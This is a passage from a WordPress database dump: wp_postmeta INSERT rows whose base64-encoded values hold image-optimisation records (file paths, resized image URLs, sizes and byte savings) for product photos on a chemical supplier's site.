8wOFwvVGlyZS1tb2xkaW5nLVJlbGVhc3lzLTg1LTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVGlyZS1tb2xkaW5nLVJlbGVhc3lzLTg1LTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVGlyZS1tb2xkaW5nLVJlbGVhc3lzLTg1LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg2NTQyLCJpZCI6NDIwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVGlyZS1tb2xkaW5nLVJlbGVhc3lzLTg1LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVGlyZS1tb2xkaW5nLVJlbGVhc3lzLTg1LTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVGlyZS1tb2xkaW5nLVJlbGVhc3lzLTg1LTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg2NTQ1LCJpZCI6NDIwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVGlyZS1tb2xkaW5nLVJlbGVhc3lzLTg1LTYwMHg2MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVGlyZS1tb2xkaW5nLVJlbGVhc3lzLTg1LTYwMHg2MDAuanBnIiwid2lkdGgiOiI2MDAiLCJoZWlnaHQiOiI2MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVGlyZS1tb2xkaW5nLVJlbGVhc3lzLTg1LTYwMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg2NTQ4LCJpZCI6NDIwfV0='); 
INSERT INTO `wp_postmeta` VALUES (30193, 401, 'wpfc_optimisation_reduction', '25131'); 
INSERT INTO `wp_postmeta` VALUES (30194, 401, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvV2luZG1pbGwtUmVsZWFTeXM4Mi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1dpbmRtaWxsLVJlbGVhU3lzODIuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4NjU1MywiaWQiOiI0MDEifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1dpbmRtaWxsLVJlbGVhU3lzODItMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9XaW5kbWlsbC1SZWxlYVN5czgyLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvV2luZG1pbGwtUmVsZWFTeXM4Mi0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6OTY5LCJ0aW1lIjoxNDgzNTg2NTU2LCJpZCI6NDAxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1dpbmRtaWxsLVJlbGVhU3lzODItODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9XaW5kbWlsbC1SZWxlYVN5czgyLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvV2luZG1pbGwtUmVsZWFTeXM4Mi04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6Mjg0MSwidGltZSI6MTQ4MzU4NjU2MCwiaWQiOjQwMX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9XaW5kbWlsbC1SZWxlYVN5czgyLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvV2luZG1pbGwtUmVsZWFTeXM4Mi03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1dpbmRtaWxsLVJlbGVhU3lzODItNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjI2MzMsInRpbWUiOjE0ODM1ODY1NjMsImlkIjo0MDF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvV2luZG1pbGwtUmVsZWFTeXM4Mi0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9XaW5kbWlsbC1SZWxlYVN5czgyLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9XaW5kbWlsbC1SZWxlYVN5czgyLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjEwMDkyLCJ0aW1lIjoxNDgzNTg2NTY4LCJpZCI6NDAxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1dpbmRtaWxsLVJlbGVhU3lzODItMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9XaW5kbWlsbC1SZWxlYVN5czgyLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvV2luZG1pbGwtUmVsZWFTeXM4Mi0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NjUyLCJ0aW1lIjoxNDgzNTg2NTcxLCJpZCI6NDAxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1dpbmRtaWxsLVJlbGVhU3lzODItMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9XaW5kbWlsbC1SZWxlYVN5czgyLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvV2luZG1pbGwtUmVsZWFTeXM4Mi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDczLCJ0aW1lIjoxNDgzNTg2NTc0LCJpZCI6NDAxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1dpbmRtaWxsLVJlbGVhU3lzODItMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9XaW5kbWlsbC1SZWxlYVN5czgyLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvV2luZG1pbGwtUmVsZWFTeXM4Mi0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NTcxLCJ0aW1lIjoxNDgzNTg2NTc4LCJpZCI6NDAxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1dpbmRtaWxsLVJlbGVhU3lzODItNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9XaW5kbWlsbC1SZWxlYVN5czgyLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvV2luZG1pbGwtUmVsZWFTeXM4Mi01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MjExNiwidGltZSI6MTQ4MzU4NjU4MSwiaWQiOjQwMX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1dpbmRtaWxsLVJlbGVhU3lzODItMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9XaW5kbWlsbC1SZWxlYVN5czgyLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvV2luZG1pbGwtUmVsZWFTeXM4Mi0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6NDEzLCJ0aW1lIjoxNDgzNTg2NTg1LCJpZCI6NDAxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvV2luZG1pbGwtUmVsZWFTeXM4Mi0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1dpbmRtaWxsLVJlbGVhU3lzODItMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9XaW5kbWlsbC1SZWxlYVN5czgyLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjo0NTIsInRpbWUiOjE0ODM1ODY1ODgsImlkIjo0MDF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9XaW5kbWlsbC1SZWxlYVN5czgyLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvV2luZG1pbGwtUmVsZWFTeXM4Mi0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1dpbmRtaWxsLVJlbGVhU3lzODItMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjU5NiwidGltZSI6MTQ4MzU4NjU5MSwiaWQiOjQwMX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1dpbmRtaWxsLVJlbGVhU3lzODItMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9XaW5kbWlsbC1SZWxlYVN5czgyLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvV2luZG1pbGwtUmVsZWFTeXM4Mi0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NjcxLCJ0aW1lIjoxNDgzNTg2NTk1LCJpZCI6NDAxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvV2luZG1pbGwtUmVsZWFTeXM4Mi00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1dpbmRtaWxsLVJlbGVhU3lzODItNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9XaW5kbWlsbC1SZWxlYVN5czgyLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjo4ODUsInRpbWUiOjE0ODM1ODY1OTgsImlkIjo0MDF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9XaW5kbWlsbC1SZWxlYVN5czgyLTYwMHg2MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvV2luZG1pbGwtUmVsZWFTeXM4Mi02MDB4NjAwLmpwZyIsIndpZHRoIjoiNjAwIiwiaGVpZ2h0IjoiNjAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1dpbmRtaWxsLVJlbGVhU3lzODItNjAweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjE3NjcsInRpbWUiOjE0ODM1ODY2MDIsImlkIjo0MDF9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30195, 391, 'wpfc_optimisation_reduction', '18533'); 
INSERT INTO `wp_postmeta` VALUES (30196, 391, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvU3lyaW5nZS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1N5cmluZ2UuanBnIiwid2lkdGgiOjI5ODgsImhlaWdodCI6MTQ1MiwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1N5cmluZ2UuanBnIiwicmVkdWN0aW9uIjoxODQwMywidGltZSI6MTQ4MzU4NjYxMSwiaWQiOiIzOTEifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1N5cmluZ2UtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TeXJpbmdlLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvU3lyaW5nZS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NjYxMywiaWQiOjM5MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TeXJpbmdlLTgwMHgzODkuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0IjozODksInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvU3lyaW5nZS04MDB4Mzg5LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1N5cmluZ2UtODAweDM4OS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY2MTUsImlkIjozOTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvU3lyaW5nZS03Njh4MzczLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6MzczLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1N5cmluZ2UtNzY4eDM3My5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9TeXJpbmdlLTc2OHgzNzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg2NjE4LCJpZCI6MzkxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1N5cmluZ2UtMTYwMHg3NzguanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6Nzc4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1N5cmluZ2UtMTYwMHg3NzguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvU3lyaW5nZS0xNjAweDc3OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY2MjEsImlkIjozOTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvU3lyaW5nZS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1N5cmluZ2UtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9TeXJpbmdlLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg2NjIzLCJpZCI6MzkxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1N5cmluZ2UtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TeXJpbmdlLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvU3lyaW5nZS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NjYyNSwiaWQiOjM5MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9TeXJpbmdlLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvU3lyaW5nZS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1N5cmluZ2UtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODY2MjgsImlkIjozOTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvU3lyaW5nZS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1N5cmluZ2UtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9TeXJpbmdlLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg2NjMwLCJpZCI6MzkxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvU3lyaW5nZS0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25